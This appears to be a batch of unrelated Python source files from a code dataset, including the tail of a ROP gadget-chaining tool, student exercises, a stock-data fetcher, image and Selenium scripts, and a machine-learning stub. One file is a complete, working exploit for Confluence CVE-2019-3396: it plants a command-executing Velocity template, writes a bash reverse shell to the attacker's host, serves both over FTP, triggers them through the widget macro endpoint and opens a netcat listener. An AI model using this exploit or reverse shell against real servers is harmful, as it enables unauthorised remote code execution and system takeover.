g.instructions[0].src == 'esp' or g.instructions[0].dst == 'esp':\n            print(colored('✘ forbidden access to/from ESP', 'red'))\n            return False\n        if g.instructions[len(g.instructions) - 1].label != 'ret;':\n            print(colored('✘ ret to address', 'red'))\n            return False\n        for i in g.instructions[1:]:\n            if i.mnemonic == 'LEAVE':\n                print(colored('✘ leave instruction', 'red'))\n                return False\n            if i.mnemonic == 'CALL':\n                print(colored('✘ call instruction', 'red'))\n                return False\n            if i.dst == g.instructions[0].dst:\n                print(colored('✘ conflicting instructions', 'red'))\n                return False\n            if i.dst == 'esp':\n                print(colored('✘ write on ESP', 'red'))\n                return False\n        print(colored('✓ potential gadget', 'green'))\n        return True\n\n    for g in glist:\n        _check_ruleset(g)\n        print(g)\n\n\ndef print_chain(gadget_chain):\n    \"\"\" Prints all the gadgets from a given chain \"\"\"\n    for g in gadget_chain:\n        print(g)\n\n\ndef print_stack(gadget_chain, payload_insn):\n    \"\"\" Prepares and prints a visualization of the stack holding the payload \"\"\"\n    CELL_WIDTH = 58\n    
ADDRESS_LENGTH = 10\n\n def _stack_cell(size, value, desc):\n \"\"\" Prints a stack cell with a given value and description \"\"\"\n print(\"|\" + \" \"*size + \"<\"+str(value)+\">\" + \" \"*(size-1) + \"| \" +\n colored(desc, 'yellow'))\n\n def _stack_separator(size=CELL_WIDTH):\n \"\"\" Prints a separator between two stack cells \"\"\"\n print(\"+\" + \"=\"*int(size/2) + \"+\")\n\n def _address_filling(value):\n \"\"\" Reformat a given string to a 8 char long hexadecimal string \"\"\"\n if len(value) != ADDRESS_LENGTH:\n return value[:2] + \"0\"*(ADDRESS_LENGTH-len(value)) + value[2:]\n return value\n\n def _prepare_stack(g):\n \"\"\" Inserts a placeholder value to be popped by subsequent gadgets \"\"\"\n label = colored(\"value to be popped\", \"cyan\")\n value = None\n if payload_insn.mnemonic in ['MOV r/m32,r32', 'MOV imm32,r32']:\n value = _address_filling(payload_insn.dst)\n elif payload_insn.mnemonic in ['MOV r/m32,imm32', 'MOV r32,imm32',\n 'MOV r32,r/m32']:\n value = _address_filling(payload_insn.src)\n if g.instructions[0].mnemonic == 'POP r32':\n _stack_cell(len(str(g.address)), value, label)\n _stack_separator()\n for insn in g.instructions[1:]:\n if insn.mnemonic == 'POP r32':\n _stack_cell(len(str(g.address)), \"0x42424242\", label)\n _stack_separator()\n\n print(\" \"*13 + \"STACK\")\n _stack_separator()\n for index, g in enumerate(gadget_chain, start=1):\n label = \"address of G\"+str(index)\n value = _address_filling(hex(g.address))\n _stack_cell(len(str(g.address)), value, label)\n _stack_separator()\n _prepare_stack(g)\n\n\ndef print_statistics(total, supported, assumed):\n \"\"\" Prints approximative stats of the program's results \"\"\"\n print(\"Total instructions: {}\".format(colored(total, 'yellow')))\n print(\"Supported: {} [{}%] \"\n \"- All assumptions\".format(colored(supported, 'green'),\n int((supported/total)*100)))\n print(\"Supported: {} [{}%] \"\n \"- No offsets\".format(colored(abs(supported-assumed), 'green'),\n int((abs(supported-assumed)/total)*100)))\n print(\"Not supported: {} [{}%]\".format(colored(total-supported, 'red'),\n int(((total-supported)/total)*100)))\n\n\ndef debug(msg):\n if DEBUG:\n print(str(msg))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='')\n parser.add_argument(\"target\", help=\"path to target binary\")\n parser.add_argument(\"object\", help=\"path to payload object file\")\n parser.add_argument(\"-D\", \"--DEBUG\", action=\"store_true\",\n help=\"enable detailed output\")\n\n args = parser.parse_args()\n target = args.target\n obj = args.object\n\n objdump = Disasm.dump_object(obj)\n opcode = Disasm.extract_opcode(objdump)\n\n X86_CODE32 = bytes.fromhex(opcode)\n all_tests = (\n (CS_ARCH_X86, CS_MODE_32, X86_CODE32, \"X86 32 (Intel syntax)\", 0),\n )\n\n ex = Extractor.Extractor(options, target)\n dis = Disasm.Disasm(all_tests)\n\n pop_gadgets = search_pop_gadgets(ex)\n push_gadgets = search_push_gadgets(ex)\n payload_insns = search_payload_insn(dis)\n\n if args.DEBUG:\n DEBUG = True\n\n gadgets_lists = {\n 'memory_write': sorted(ex.search_gadgets('mov [e??], e??;'),\n key=lambda gadget: len(gadget.instructions)),\n 'memory_read': sorted(ex.search_gadgets('mov e??, [e??]'),\n key=lambda gadget: len(gadget.instructions)),\n 'register_move': sorted(ex.search_gadgets('mov e??, e??'),\n key=lambda gadget: len(gadget.instructions)),\n }\n\n # Test cases with manual instructions used to find gadget chains\n debug_instructions = [\n Instruction('mov ecx, ebp', 0x12345678, 'MOV r/m32,r32',\n 'ecx', 
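
print_stack only draws the cells; the bytes that would actually overwrite the stack are just the chain's gadget addresses and popped values packed as little-endian dwords. A hedged sketch with made-up addresses:

    # Hedged sketch (not part of this tool): serialize a gadget chain into
    # the 32-bit little-endian words of the stack payload.
    import struct

    chain = [0x080484b6,   # G1: pop eax ; ret        (made-up address)
             0x41414141,   #     value popped into eax
             0x080485c2]   # G2: mov [edi], eax ; ret (made-up address)

    payload = b''.join(struct.pack('<I', word) for word in chain)
    print(payload.hex())   # one dword per stack cell, lowest address first
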
'ebp'),\n        Instruction('mov eax, ecx', 0x12345678, 'MOV r/m32,r32',\n                    'eax', 'ecx'),\n        Instruction('mov dword ptr [edi], eax', 0x12345678, 'MOV r/m32,r32',\n                    'edi', 'eax'),\n        Instruction('mov dword ptr [ebx], ecx', 0x12345678, 'MOV r/m32,r32',\n                    'ebx', 'ecx'),\n        Instruction('mov dword ptr [edi], ecx', 0x12345678, 'MOV r/m32,r32',\n                    'edi', 'ecx'),\n        Instruction('mov dword ptr eax, [edx]', 0x12345678, 'MOV r32,r/m32',\n                    'eax', 'edx'),\n        Instruction('mov dword ptr ebx, [ecx]', 0x12345678, 'MOV r32,r/m32',\n                    'ebx', 'ecx'),\n        Instruction('mov dword ptr [eax], 0x1', 0x12345678, 'MOV r/m32,imm32',\n                    'eax', '0x1'),\n        Instruction('mov dword ptr [eax], ds:0x0', 0x12345678, 'MOV r/m32,imm32',\n                    'eax', '0x0'),\n        Instruction('mov eax, 0x8000000', 0x12345678, 'MOV r/m32,imm32',\n                    'eax', '0x8000000'),\n    ]\n\n    reglist = ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']\n    controlled_regs = []\n\n    if DEBUG:\n        for gtype, glist in gadgets_lists.items():\n            print(\"DEBUG: \" + gtype)\n            print(\"-\" * 80)\n            print_rule_validation(glist)\n    for reg in pop_gadgets:\n        if reg.instructions[0].dst not in controlled_regs:\n            controlled_regs.append(reg.instructions[0].dst)\n\n    missing_regs = list(set(reglist) - set(controlled_regs))\n\n    for gtype in gadgets_lists.keys():\n        gadgets_lists[gtype] = [\n            g for g in gadgets_lists[gtype]\n            if check_gadget_validity(g, controlled_regs)\n        ]\n\n    print(\"Dumping target payload <%s>:\" % obj)\n    print(\"-\" * 80)\n    print(objdump)\n\n    print(\"Pop gadgets:\")\n    print(\"-\" * 80)\n    for g in pop_gadgets:\n        print(g)\n\n\n    print(\"Register move gadgets: \")\n    print(\"-\" * 80)\n    for g in gadgets_lists['register_move']:\n        print(g)\n\n    print(\"Memory read gadgets: \")\n    print(\"-\" * 80)\n    for g in gadgets_lists['memory_read']:\n        print(g)\n\n    print(\"Memory write gadgets: \")\n    print(\"-\" * 80)\n    for g in gadgets_lists['memory_write']:\n        print(g)\n\n    print(\"Controlled registers: \\n\\t%s\" %\n          colored(' '.join(str(cr) for cr in controlled_regs), 'green'))\n    if missing_regs:\n        print(\"Missing: \\n\\t%s\" %\n              colored(' '.join(str(mr) for mr in missing_regs), 'red'))\n\n    regmove_map = map_possible_movements('register_move', gadgets_lists)\n    memwrite_map = map_possible_movements('memory_write', gadgets_lists)\n    memread_map = map_possible_movements('memory_read', gadgets_lists)\n\n    print(\"Possible reg mov:\")\n    print(\"\\tsrc: dst (green = direct mov, blue = chained)\")\n    for reg in regmove_map.keys():\n        if regmove_map[reg][\"direct\"]:\n            print(\"\\t%s: %s %s %s\" % (\n                reg,\n                colored(' '.join(\n                    str(m) for m in regmove_map[reg][\"direct\"]), 'green'),\n                colored(' '.join(\n                    str(m) for m in regmove_map[reg][\"chained\"]), 'cyan'),\n                colored(' '.join(\n                    str(m) for m in regmove_map[reg][\"missing\"]), 'red'),\n            ))\n\n    print(\"Possible memory write: \")\n    for reg in memwrite_map.keys():\n        if memwrite_map[reg][\"direct\"]:\n            print(\"\\t%s: %s %s\" % (\n                reg,\n                colored(' '.join(\n                    str(m) for m in memwrite_map[reg][\"direct\"]), 'green'),\n                colored(' '.join(\n                    str(m) for m in memwrite_map[reg][\"missing\"]), 'red'),\n            ))\n\n    print(\"Possible memory read: \")\n    for reg in memread_map.keys():\n        if memread_map[reg][\"direct\"]:\n            print(\"\\t%s: %s %s\" % (\n                reg,\n                colored(' '.join(\n                    str(m) for m in memread_map[reg][\"direct\"]), 'green'),\n                colored(' '.join(\n                    str(m) for m in memread_map[reg][\"missing\"]), 'red'),\n            ))\n    print()\n\n    # Search a gadget chain for each test instruction in our list\n    supported_insns = 0\n    assumed_insns = 0\n    for insn in payload_insns:\n        print(\"-\"*80)\n        print()\n        print(colored(\"Target: 
\"+insn.label, \"yellow\"))\n if is_supported(insn):\n if insn.src_offset or insn.dst_offset:\n assumed_insns += 1\n gchain = find_chain(insn, gadgets_lists, regmove_map)\n debug(insn.src)\n debug(insn.dst)\n debug(insn.mnemonic)\n if gchain:\n supported_insns += 1\n print_chain(gchain)\n print_stack(gchain, insn)\n else:\n print(colored(\"No chain found\", \"red\"))\n print()\n print_statistics(len(payload_insns), supported_insns, assumed_insns)\n\n if DEBUG:\n for insn in debug_instructions:\n print(\"-\"*80)\n print()\n gchain = find_chain(insn, gadgets_lists, regmove_map)\n print(colored(\"Target: \"+insn.label, \"yellow\"))\n print(insn.src)\n print(insn.dst)\n debug(insn.mnemonic)\n if gchain:\n print_chain(gchain)\n print_stack(gchain, insn)\n else:\n print(colored(\"No chain found\", \"red\"))\n","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":27055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"521295063","text":"import pickle\r\n\r\n#main\r\ndef main():\r\n again = 'y' #Control loop repetition\r\n\r\n #Open file for binary writing\r\n output_file = open('info.dat', 'wb')\r\n\r\n #Get data until user want to stop\r\n while again.lower() == 'y':\r\n #Get data about a person and save it\r\n save_data(output_file)\r\n\r\n #Does the user want to enter more data?\r\n again = input('Enter more data? (y/n): ')\r\n\r\n #Close file\r\n output_file.close()\r\n\r\n#Save_data func gets data about a person, store in dictionary\r\n#then pickles the dictionary to the specified file\r\ndef save_data(file):\r\n #Create empty dict\r\n person = {}\r\n\r\n #Get data for person and store\r\n person['name'] = input('Name: ')\r\n person['age'] = input('Age: ')\r\n person['weight'] = float(input('Weight: '))\r\n\r\n #pickle the dictionary\r\n pickle.dump(person, file)\r\n\r\nmain() \r\n","sub_path":"Chap 9/pickle_objects.py","file_name":"pickle_objects.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548863021","text":"from functools import reduce\nimport unittest\nimport graph_tool.all as gt\nfrom math import factorial\nfrom numpy import sqrt\nfrom itertools import permutations\n\nn = 6\npaths = set([])\ng = gt.Graph()\nvl = g.new_vertex_property(\"vector\")\nlv = dict([])\ntc = unittest.TestCase('__init__')\n\ndef pancakesort(lst):\n def flip(end):\n data_tmp = tuple(lst)\n lst[:end] = lst[:end][::-1]\n path = (data_tmp, tuple(lst))\n if path in paths:\n raise ValueError('already known path')\n else:\n paths.add(path)\n\n if len(lst) < 2:\n return lst\n \n for i in range(len(lst), 1, -1):\n \n max_num_pos = 0\n for a in range(i):\n if lst[a] > lst[max_num_pos]:\n max_num_pos = a\n\n if max_num_pos == i-1:\n continue\n \n if max_num_pos != 0:\n flip(max_num_pos + 1);\n \n flip(i);\n \n return lst\n\nfor v, l in zip(g.add_vertex(factorial(n)), permutations(range(n))):\n vl[v] = l\n lv[l] = v\n try:\n tc.assertEqual(pancakesort(list(l)), sorted(list(l)))\n except ValueError:\n pass\n\nfor s, t in paths:\n g.add_edge(lv[s], lv[t])\n\n#pos = gt.arf_layout(g, max_iter=0)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-arf.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.radial_tree_layout(g, g.vertex(0))\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-radial.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.fruchterman_reingold_layout(g, 
n_iter=1000)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-fr.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\n#pos = gt.sfdp_layout(g)\n#gt.graph_draw(g, pos=pos, output=\"pancakes0-sfdp.pdf\", vertex_text=vl, vertex_font_size=12, output_size=(3000, 3000))\n\ndeg = g.degree_property_map(\"in\")\ndeg.a = 4 * (sqrt(deg.a) * 0.5 + 0.4)\nebet = gt.betweenness(g)[1]\nebet.a /= ebet.a.max() / 10.\neorder = ebet.copy()\neorder.a *= -1\npos = gt.sfdp_layout(g)\ncontrol = g.new_edge_property(\"vector\")\nfor e in g.edges():\n d = sqrt(sum((pos[e.source()].a - pos[e.target()].a) ** 2)) / 5\n control[e] = [0.3, d, 0.7, d]\ngt.graph_draw(g, pos=pos, vertex_size=deg, vertex_fill_color=deg, vorder=deg,\nedge_color=ebet, eorder=eorder, edge_pen_width=ebet,\nedge_control_points=control, # some curvy edges\noutput=\"graph-draw.pdf\")\n","sub_path":"pancakes0.py","file_name":"pancakes0.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"396102438","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*- ####################################################################################\n#▄█▄ ████▄ ▄ ▄████ █ ▄ ▄███▄ ▄ ▄█▄ ▄███▄ █▄▄▄▄ ▄█▄ ▄███▄ #\n#█▀ ▀▄ █ █ █ █▀ ▀ █ █ █▀ ▀ █ █▀ ▀▄ █▀ ▀ █ ▄▀ █▀ ▀▄ █▀ ▀ #\n#█ ▀ █ █ ██ █ █▀▀ █ █ █ ██▄▄ ██ █ █ ▀ ██▄▄ █▀▀▌ █ ▀ ██▄▄ #\n#█▄ ▄▀ ▀████ █ █ █ █ ███▄ █ █ █▄ ▄▀ █ █ █ █▄ ▄▀ █▄ ▄▀ █ █ █▄ ▄▀ █▄ ▄▀ #\n#▀███▀ █ █ █ █ ▀ █▄ ▄█ ▀███▀ █ █ █ ▀███▀ ▀███▀ █ ▀███▀ ▀███▀ #\n# █ ██ ▀ ▀▀▀ █ ██ ▀ #\n# confluence_rce .py - nighter@nighter.se [CVE-2019-3396] #\n# #\n# DATE #\n# 03/04/2019 #\n# #\n# DESCRIPTION #\n# The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 #\n# (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), #\n# from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 #\n# (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code #\n# execution on a Confluence Server or Data Center instance via server-side template injection. 
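
A hedged mini-example of the degree-scaled drawing used above, applied to a small sample graph bundled with graph-tool (assumes graph-tool is installed; "karate" is one of its stock datasets):

    # Mini-example: size vertices by degree with the same rescaling formula.
    import graph_tool.all as gt
    from numpy import sqrt

    g = gt.collection.data["karate"]
    deg = g.degree_property_map("total")
    deg.a = 4 * (sqrt(deg.a) * 0.5 + 0.4)   # same rescaling as above
    gt.graph_draw(g, vertex_size=deg, vertex_fill_color=deg,
                  output="karate-deg.pdf")
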
#\n# #\n# #\n#############################################################################################################\n\nimport requests\nimport time\nimport sys\nimport os\n\nfrom multiprocessing import Process\n\n\ndef create_payload():\n\n payload = '''#set ($e=\"exp\")\n#set ($a=$e.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec($cmd))\n#set ($input=$e.getClass().forName(\"java.lang.Process\").getMethod(\"getInputStream\").invoke($a))\n#set($sc = $e.getClass().forName(\"java.util.Scanner\"))\n#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName(\"java.io.InputStream\")))\n#set($scan=$constructor.newInstance($input).useDelimiter(\"\\\\A\"))\n#if($scan.hasNext())\n $scan.next()\n#end'''\n\n with open('/tmp/payload.vm', 'w') as file:\n file.write(payload)\n\n payload = '''#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1''' % (LHOST, LPORT)\n\n with open('/tmp/payload.sh', 'w') as file:\n file.write(payload)\n\n\ndef start_ftp_server():\n os.chdir('/tmp')\n os.system(\"python3 -m pyftpdlib -p 2121 > /dev/null 2>&1\")\n\n\ndef rce_cmd(command):\n\n session = requests.session()\n url = \"%s/rest/tinymce/1/macro/preview\" % URL\n headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\",\n \"Referer\": \"%s/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&\" % url,\n \"Content-Type\": \"application/json; charset=utf-8\"}\n\n json_payload = {\"contentId\": \"12345\", \"macro\": {\"body\": \"\", \"name\": \"widget\",\n \"params\": {\"_template\": \"ftp://%s:2121/payload.vm\" % LHOST, \"cmd\": \"%s\" % command,\n \"height\": \"200\",\n \"url\": \"http://www.dailymotion.com/video/xcpa64\",\n \"width\": \"300\"}}}\n\n r = session.post(url, headers=headers, json=json_payload)\n\n\ndef exploit():\n\n time.sleep(3)\n print('[+] Exploit')\n\n command = '''curl ftp://%s:2121/payload.sh -o /tmp/payload.sh''' % LHOST\n rce_cmd(command)\n\n command = '''chmod +x /tmp/payload.sh'''\n rce_cmd(command)\n\n command = '''/tmp/payload.sh'''\n rce_cmd(command)\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 4:\n print (\"\"\"\n▄█▄ ████▄ ▄ ▄████ █ ▄ ▄███▄ ▄ ▄█▄ ▄███▄ █▄▄▄▄ ▄█▄ ▄███▄ \n█▀ ▀▄ █ █ █ █▀ ▀ █ █ █▀ ▀ █ █▀ ▀▄ █▀ ▀ █ ▄▀ █▀ ▀▄ █▀ ▀ \n█ ▀ █ █ ██ █ █▀▀ █ █ █ ██▄▄ ██ █ █ ▀ ██▄▄ █▀▀▌ █ ▀ ██▄▄ \n█▄ ▄▀ ▀████ █ █ █ █ ███▄ █ █ █▄ ▄▀ █ █ █ █▄ ▄▀ █▄ ▄▀ █ █ █▄ ▄▀ █▄ ▄▀ \n▀███▀ █ █ █ █ ▀ █▄ ▄█ ▀███▀ █ █ █ ▀███▀ ▀███▀ █ ▀███▀ ▀███▀ \n █ ██ ▀ ▀▀▀ █ ██ ▀ \n[nighter@nighter.se]\n \"\"\")\n print(\"Usage: %s \" % (sys.argv[0]))\n print(\"EXAMPLE: ./confluence_rce.py 'http://localhost:8090' 10.10.14.24 1337\\n\")\n sys.exit(0)\n\n URL = sys.argv[1]\n LHOST = sys.argv[2]\n LPORT = sys.argv[3]\n\n create_payload()\n p = Process(target=start_ftp_server)\n p.start()\n\n # Exploit windows\n p = Process(target=exploit)\n p.start()\n\n print(\"[+] Netcat = %s\" % LPORT)\n os.system('nc -lnvp %s' % LPORT)","sub_path":"CVE-2019-3396_confluence_rce/confluence_rce.py","file_name":"confluence_rce.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"171459918","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtCore import *\nimport 
time\nimport sqlite3\nimport pandas as pd\n\nTR_REQ_TIME_INTERVAL = 0.5\n\n\nclass Kiwoom(QAxWidget):\n    def __init__(self):\n        super().__init__()\n        self._create_kiwoom_instance()\n        self._set_signal_slots()\n\n    def _create_kiwoom_instance(self):\n        self.setControl(\"KHOPENAPI.KHOpenAPICtrl.1\")\n\n    def _set_signal_slots(self):\n        self.OnEventConnect.connect(self._event_connect)\n        self.OnReceiveTrData.connect(self._receive_tr_data)\n\n    def comm_connect(self):\n        self.dynamicCall(\"CommConnect()\")\n        self.login_event_loop = QEventLoop()\n        self.login_event_loop.exec_()\n\n    def _event_connect(self, err_code):\n        if err_code == 0:\n            print(\"connected\")\n        else:\n            print(\"disconnected\")\n\n        self.login_event_loop.exit()\n\n    def set_input_value(self, id, value):\n        self.dynamicCall(\"SetInputValue(QString, QString)\", id, value)\n\n    def comm_rq_data(self, rqname, trcode, next, screen_no):\n        self.dynamicCall(\"CommRqData(QString, QString, int, QString)\", rqname, trcode, next, screen_no)\n        self.tr_event_loop = QEventLoop()\n        self.tr_event_loop.exec_()\n\n    def _comm_get_data(self, code, real_type, field_name, index, item_name):\n        ret = self.dynamicCall(\"CommGetData(QString, QString, QString, int, QString)\", code,\n                               real_type, field_name, index, item_name)\n        return ret.strip()\n\n    def _get_repeat_cnt(self, trcode, rqname):\n        ret = self.dynamicCall(\"GetRepeatCnt(QString, QString)\", trcode, rqname)\n        return ret\n\n    def _receive_tr_data(self, screen_no, rqname, trcode, record_name, next, unused1, unused2, unused3, unused4):\n        if next == '2':\n            self.remained_data = True\n        else:\n            self.remained_data = False\n\n        if rqname == \"req_1\":\n            self._opt20005(rqname, trcode)\n\n        try:\n            self.tr_event_loop.exit()\n        except AttributeError:\n            pass\n\n    def _opt20005(self, rqname, trcode):\n        data_cnt = self._get_repeat_cnt(trcode, rqname)\n        for i in range(data_cnt):\n            price = self._comm_get_data(trcode, \"\", rqname, i, \"현재가\")\n            date = self._comm_get_data(trcode, \"\", rqname, i, \"체결시간\")\n            volume = self._comm_get_data(trcode, \"\", rqname, i, \"거래량\")\n            open = self._comm_get_data(trcode, \"\", rqname, i, \"시가\")\n            high = self._comm_get_data(trcode, \"\", rqname, i, \"고가\")\n            low = self._comm_get_data(trcode, \"\", rqname, i, \"저가\")\n            self.data['date'].append(date)\n            self.data['price'].append(price)\n            self.data['volume'].append(volume)\n            self.data['open'].append(open)\n            self.data['high'].append(high)\n            self.data['low'].append(low)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    kiwoom = Kiwoom()\n    kiwoom.comm_connect()\n\n    kiwoom.data = {'date': [], 'price': [], 'volume': [], 'open': [], 'high': [], 'low': []}\n\n    req_count = 0\n    con = sqlite3.connect(\"option 4월물.db\")\n    cur = con.cursor()\n    cur.execute('SELECT \"date\" FROM \"KOSPI200\"')\n    dbline = cur.fetchone()\n\n    print(\"now processing KOSPI 200\")\n    kiwoom.set_input_value(\"업종코드\", \"201\")\n    kiwoom.set_input_value(\"틱범위\", \"1\")\n    kiwoom.comm_rq_data(\"req_1\", \"opt20005\", 0, \"0101\")\n    req_count += 1\n    print(\"Request count : \", req_count)\n    while kiwoom.remained_data == True:\n        time.sleep(TR_REQ_TIME_INTERVAL)\n        kiwoom.set_input_value(\"업종코드\", \"201\")\n        kiwoom.set_input_value(\"틱범위\", \"1\")\n        kiwoom.comm_rq_data(\"req_1\", \"opt20005\", 2, \"0101\")\n        req_count += 1\n        print(\"Request count : \", req_count)\n        if req_count == 99:\n            time.sleep(30)\n        if int(kiwoom.data['date'][-1]) <= int(dbline[0]):\n            line_num = kiwoom.data['date'].index(dbline[0])\n            del kiwoom.data['date'][line_num:]\n            del kiwoom.data['price'][line_num:]\n            del kiwoom.data['volume'][line_num:]\n            del kiwoom.data['open'][line_num:]\n            del kiwoom.data['high'][line_num:]\n            del kiwoom.data['low'][line_num:]\n            break\n\n    df = pd.DataFrame(kiwoom.data, columns=['date', 'open', 'high', 'low', 'price', 'volume'])\n    df.to_sql('KOSPI200', con, if_exists='append', index=False)\n    con.commit()\n    con.close()\n    conn = sqlite3.connect(\"option 4월물.db\")\n    df2 = pd.read_sql('select * from \"KOSPI200\" ORDER BY \"date\" desc', con=conn)\n    df2.to_sql('KOSPI200', conn, if_exists='replace', index=False)\n    conn.commit()\n    conn.close()\n","sub_path":"opt kospi200 code add.py","file_name":"opt kospi200 code add.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}{"seq_id":"231604356","text":"# coding:utf-8\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport image_funcs as imf\r\nfrom k_means import run_kmeans\r\n\r\noriginal_path = \"Images/black_board.JPG\"  # \"Images/otaku_green.png\"\r\nnew_path = \"Images/black_board.png\"\r\n\r\n\r\ndef print_image(title, image):\r\n    print(title + \" info: \" + str(image.shape))  # get the array dimensions\r\n    cv2.imshow(title, image)\r\n    cv2.waitKey()\r\n\r\n\r\n# for the arguments see -> http://opencv.jp/opencv-2.1/cpp/reading_and_writing_images_and_video.html\r\nimage = cv2.imread(original_path)\r\nimage = imf.scale(image, 500, 500)\r\nimage = imf.cv2pil(image)\r\nimage = list(image.convert('RGB').getdata())\r\nimage = imf.pil2cv(run_kmeans(image, 8))\r\nprint_image(\"raw_image_info\", image)\r\n\r\ngreen_min = np.array([110, 110, 100], np.uint8)  # ([0, 100, 0], np.uint8)  # a dark colour, like pure green with black added\r\ngreen_max = np.array([140, 140, 150], np.uint8)  # ([30, 130, 30], np.uint8)  # a brighter green with a little R and B added, raising the saturation\r\n\r\nthreshold_otaku = cv2.bitwise_not(cv2.inRange(image, green_min, green_max))  # binarize and invert black/white; after binarization the array becomes two-dimensional\r\nprint_image(\"threshold_otaku\", threshold_otaku)\r\n\r\nmask = cv2.cvtColor(threshold_otaku, cv2.COLOR_GRAY2BGR)  # convert the binarized two-dimensional image to BGR so it becomes three-dimensional again\r\nprint_image(\"otaku_mask\", mask)\r\n\r\nnew_image = cv2.addWeighted(image, 1, mask, 1, 0)\r\n\r\nprint_image(\"new_otaku\", new_image)\r\n\r\ncv2.imwrite(new_path, new_image)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}{"seq_id":"34651308","text":"from selenium import webdriver\n\ndriver_path = r'/home/hushengquan/下载/chromedriver'\ndriver = webdriver.Chrome(executable_path=driver_path)\ndriver.get('https://www.baidu.com')\n\ndriver.execute_script('window.open(\"https://www.douban.com/\")')  # open another page on top of the existing one\nprint(driver.current_url)\n\ndriver.switch_to_window(driver.window_handles[1])\nprint(driver.current_url)\n\n\n# Although a new page was opened in the browser window, the driver has not switched to it\n# If you want the code to switch to the new page and do some crawling there,\n# you should use driver.switch_to_window to switch to the target window,\n# picking the desired window out of driver.window_handles\n# driver.window_handles is a list holding the window handles\n# It stores the handles in the order the pages were opened\n","sub_path":"selenium/demo62-selenium打开多窗口和切换窗口.py","file_name":"demo62-selenium打开多窗口和切换窗口.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}{"seq_id":"351832254","text":"def is_same_list(numbers):\n    result = True\n    key_number = numbers[0]\n    for i in range(1, len(numbers)):\n        if key_number != numbers[i]:\n            result = False\n            break\n    return result\n\ndef make_new_list(numbers, max_index):\n    for i in range(len(numbers)):\n        numbers[i] += 1\n    numbers[max_index] -= 1\n    return numbers\n\nn = 
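
The Kiwoom class above turns the asynchronous OpenAPI callbacks into blocking calls by spinning a nested QEventLoop until the event handler calls exit(). A standalone sketch of the same pattern that needs only PyQt5, with a QTimer standing in for the OnEventConnect callback:

    # Standalone sketch (requires PyQt5 only, no Kiwoom OCX): block on a
    # local event loop until the awaited "event" fires.
    import sys
    from PyQt5.QtWidgets import QApplication
    from PyQt5.QtCore import QEventLoop, QTimer

    app = QApplication(sys.argv)
    loop = QEventLoop()
    QTimer.singleShot(1000, loop.quit)   # stands in for the API callback
    print("waiting for 'event'...")
    loop.exec_()                         # blocks, like comm_connect above
    print("event received, continuing")
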
int(input())\nnumbers = []\nfor i in range(n):\n    numbers.append(int(input()))\nans = 0\nwhile not is_same_list(numbers):\n    numbers = make_new_list(numbers, numbers.index(max(numbers)))\n    ans += 1\nprint(ans)","sub_path":"python/test/mr/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}{"seq_id":"297726640","text":"import time\nimport numpy as np\nimport cv2\nfrom glob import glob\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, CSVLogger, TensorBoard\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport keras.backend as K\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import Model\nimport copy\nimport os\nimport csv\nimport matplotlib.pyplot as plt\nfrom Unet_based import ResUnet\nfrom Unet_based import Transpose_ResUnet\nfrom Unet_based import Transpose_Unet\nfrom Unet_based import Unet\nfrom Unet_based import continuous_blocks_ResUnet\nfrom Unet_based import ensemble\nfrom Unet_based import ensemble_2\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import accuracy_score\nimport datetime\nimport Unet_based as un\n\n\ndef load_data(path, image_modality):\n    print(path)\n    path_images = ''.join([path, 'image/*'])\n    path_labels = ''.join([path, \"label/*\"])\n    images = sorted(glob(path_images))\n    masks = 